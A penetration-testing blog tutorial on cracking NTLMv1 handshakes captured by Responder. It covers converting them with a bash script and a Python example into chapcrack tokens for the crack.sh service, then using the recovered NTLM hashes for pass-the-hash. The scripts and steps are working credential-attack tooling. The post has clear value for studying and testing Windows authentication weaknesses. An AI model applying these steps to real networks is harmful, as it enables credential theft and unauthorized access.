Cracking NTLMv1 Handshakes with Crack.sh

Read on if you’d like to learn how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. Publicized since 2013, this technique is not often leveraged by testers.

Running Responder.py is one of the first tasks most pentesters perform on an internal penetration test. The tool poisons LLMNR, NBT-NS and mDNS name-resolution queries and captures NTLMv1 and NTLMv2 challenge/response handshakes from hosts that trust its spoofed answers. Usually the next step is to try to crack those handshakes, at a minimum by running them against a wordlist such as the crackstation list.

An NTLMv1 handshake, however, offers another, usually ignored, cracking option that is guaranteed to recover the NTLM hash regardless of password strength: the response is built from DES, so the hash can be recovered by exhausting the DES keyspace instead of guessing the password. The NTLM hash can then be used as a password equivalent (pass-the-hash) in a Windows environment, which the NTLMv1 handshake itself cannot.

Required Reading

An MS-CHAPv2 response is three DES encryptions of the same 8-byte challenge, keyed with three 7-byte slices of the 16-byte NT hash padded with five zero bytes. Two of the keys are full 56-bit DES keys; the third contains only 2 bytes of hash material (16 unknown bits) and falls to a trivial local brute force. Because all three encryptions use the same plaintext, one pass over the 2^56 keyspace recovers both full keys, and Moxie Marlinspike and David Hulton demonstrated at DEF CON 20 that modern FPGA hardware can make that pass in under a day (https://www.youtube.com/watch?v=sIidzPntdCM).

NTLMv1 computes its NT response with the same DES construction over the NT hash and an 8-byte challenge, so it is susceptible to the same attack, as Mark Gamache spelled out in 2013 (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).

How do we exploit this?

The crack.sh service will recover the NTLM hash from any MS-CHAPv2 or NTLMv1 handshake for $20. It does not accept the raw challenge and response as Responder prints them; it takes a chapcrack token, so the handshake has to be converted first.

Use the script below to convert Responder's NTLMv1 output lines (user::domain:lmresp:ntresp:challenge) into the challenge/response pair that chapcrack turns into a token crack.sh will accept.

#!/bin/bash
# Convert Responder NTLMv1 lines (user::domain:lmresp:ntresp:challenge) into the
# challenge/response pair that chapcrack's "radius" mode turns into a crack.sh token.

if [ $# -lt 1 ]
then
    echo "Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> ..."
    exit 1
fi

for i in "$@"; do
    while read -r hash
    do
        [ -z "$hash" ] && continue
        user=$(echo "$hash" | cut -f1 -d:)
        domain=$(echo "$hash" | cut -f3 -d:)
        lmresp=$(echo "$hash" | cut -f4 -d:)
        ntresp=$(echo "$hash" | cut -f5 -d:)
        srvchallenge=$(echo "$hash" | cut -f6 -d:)

        # Responder's NTLMv2 lines also have six fields; only a 24-byte NT response
        # (48 hex chars) to an 8-byte challenge can be DES-cracked, so skip the rest.
        if [ ${#ntresp} -ne 48 ] || [ ${#srvchallenge} -ne 16 ]
        then
            echo "skipping $user: not an NTLMv1 handshake"
            continue
        fi

        # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html
        # With NTLMv1-ESS the LM field is an 8-byte client challenge padded with 16 zero
        # bytes, and the 8 bytes that were DES-encrypted are
        # MD5(server challenge || client challenge)[0:8], not the server challenge itself.
        if [ "${lmresp:16:32}" = "00000000000000000000000000000000" ]
        then
            clientchallenge=${lmresp:0:16}
            combinedchallenge=$srvchallenge$clientchallenge
            srvchallenge=$(echo "$combinedchallenge" | xxd -r -p | md5sum -b | cut -c1-16)
        fi

        echo
        echo "user:$user"
        echo "domain:$domain"
        echo "lmresponse:$lmresp"
        echo "ntresp:$ntresp"
        echo "challenge:$srvchallenge"

        # Run chapcrack if it is on this box; otherwise print the command to run elsewhere.
        chapcrack=$(locate chapcrack.py | head -1)
        if [ -n "$chapcrack" ] && [ -e "$chapcrack" ]
        then
            "$chapcrack" radius -R "$ntresp" -C "$srvchallenge"
        else
            echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
        fi
    done < "$i"
done

Upload this token to crack.sh, give them 20 dollars, and wait for your NTLM hash.
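To make both the conversion and the underlying weakness concrete, here is an added Python example; it is not code from the original post, nor part of chapcrack or crack.sh. It does what the bash script above does, parsing Responder NTLMv1 lines, detecting the ESS case and deriving the MD5 challenge, and additionally rejects NTLMv2 lines, which share Responder's six-field layout but cannot be DES-cracked. It then splits a sample NT hash into the three DES keys described under Required Reading to show why the third key is the cheap one. The user names, domain and hex values in SAMPLE_LINES are constructed, not captured, and the function names are this example's own.

```python
#!/usr/bin/env python3
"""Added worked example (not code from the original post): parse Responder
NTLMv1 lines, derive the challenge that chapcrack's `radius` mode and crack.sh
need (including the Extended Session Security case), and lay out the three DES
keys that the NT hash becomes. Standard library only; every sample line below
is constructed, not captured."""
import hashlib
from typing import Iterator

ZERO16_HEX = "0" * 32  # sixteen zero bytes, hex encoded

# Constructed sample lines in Responder's NTLMv1 format:
#   user::domain:lmresp(48 hex):ntresp(48 hex):server_challenge(16 hex)
SAMPLE_LINES = [
    # Plain NTLMv1: both LM and NT responses are full 24-byte DES outputs
    "jdoe::CORP:" + "a1" * 24 + ":" + "b2" * 24 + ":1122334455667788",
    # NTLMv1 with ESS: LM field = 8-byte client challenge + 16 zero bytes
    "asmith::CORP:aabbccddeeff0011" + ZERO16_HEX + ":" + "c3" * 24 + ":1122334455667788",
    # NTLMv2 (also six fields!): 16-hex challenge, 32-hex NTProofStr, long blob
    "bjones::CORP:1122334455667788:" + "d4" * 16 + ":0101000000000000" + "e5" * 40,
]


def parse_responder_line(line: str) -> dict:
    """Split one Responder line and refuse anything that is not NTLMv1."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("expected user::domain:lmresp:ntresp:challenge")
    user, _, domain, lmresp, ntresp, challenge = parts
    # NTLMv2 lines also have six fields but different widths; only a 24-byte
    # NT response to an 8-byte challenge can be DES-cracked, so reject the rest.
    if len(lmresp) != 48 or len(ntresp) != 48 or len(challenge) != 16:
        raise ValueError("not an NTLMv1 handshake; crack.sh cannot recover the hash")
    return {"user": user, "domain": domain, "lmresp": lmresp.lower(),
            "ntresp": ntresp.lower(), "challenge": challenge.lower()}


def uses_ess(rec: dict) -> bool:
    """ESS (NTLMv1-SSP) marks itself by zero-padding the LM field."""
    return rec["lmresp"][16:] == ZERO16_HEX


def effective_challenge(rec: dict) -> str:
    """The 8 bytes that were actually fed to DES, as hex.

    Plain NTLMv1 encrypts the server challenge as sent. With ESS the DES
    input is MD5(server_challenge || client_challenge)[:8], the step the
    Samba-list post calls out and the bash script does with xxd | md5sum.
    """
    if not uses_ess(rec):
        return rec["challenge"]
    server_challenge = bytes.fromhex(rec["challenge"])
    client_challenge = bytes.fromhex(rec["lmresp"][:16])
    return hashlib.md5(server_challenge + client_challenge).hexdigest()[:16]


def chapcrack_command(rec: dict) -> str:
    """The invocation the post's script prints or runs for this line."""
    return f"chapcrack.py radius -R {rec['ntresp']} -C {effective_challenge(rec)}"


def expand_des_key(key7: bytes) -> bytes:
    """Turn 7 key bytes into the 8-byte DES key form (7 bits + odd parity each)."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        chunk = (bits >> (49 - 7 * i)) & 0x7F
        byte = chunk << 1
        if bin(byte).count("1") % 2 == 0:  # DES wants odd parity per byte
            byte |= 1
        out.append(byte)
    return bytes(out)


def des_keys_from_nt_hash(nt_hash: bytes) -> tuple:
    """NTLMv1 / MS-CHAPv2 pad the 16-byte NT hash with five zero bytes and cut
    the 21 bytes into three 7-byte DES keys; each encrypts the same challenge."""
    if len(nt_hash) != 16:
        raise ValueError("NT hash is 16 bytes")
    padded = nt_hash + b"\x00" * 5
    return tuple(expand_des_key(padded[i:i + 7]) for i in (0, 7, 14))


def candidate_k3_keys() -> Iterator[bytes]:
    """Every possible third key: only nt_hash[14:16] is unknown, the other five
    bytes are zero padding, so 2^16 guesses cover it. chapcrack does this
    small search itself; crack.sh's DES search is for the two full keys."""
    for tail in range(1 << 16):
        yield expand_des_key(tail.to_bytes(2, "big") + b"\x00" * 5)


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        try:
            rec = parse_responder_line(line)
        except ValueError as err:
            print(f"skip {line.split(':')[0]}: {err}")
            continue
        print(f"{rec['user']} ess={uses_ess(rec)} -> {chapcrack_command(rec)}")
    k1, k2, k3 = des_keys_from_nt_hash(bytes(range(16)))
    print("K3 =", k3.hex(), "(only its first 16 bits come from the hash)")
```

Run it directly to see the chapcrack command for each sample line; the NTLMv2 line is skipped with a message rather than turned into a meaningless token. The parity expansion is the standard 56-to-64-bit DES key expansion (Samba's str_to_key), which is why the last five bytes of K3 always come out as 0x01: they carry no key material, and that is the whole reason the third DES block costs 2^16 guesses instead of 2^56.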

Another Hash?

Yes, but an NTLM hash is a password equivalent in a Windows environment: it can be passed directly to authenticate (pass-the-hash) without the password ever being cracked. To leverage your newly acquired NTLM hash, use a pass-the-hash tool such as wmi-pth.

 


All recommendations and case studies presented by Tevora are for information purposes only and not intended to be for the purposes of providing information security advice. Any use of this information for other means is prohibited.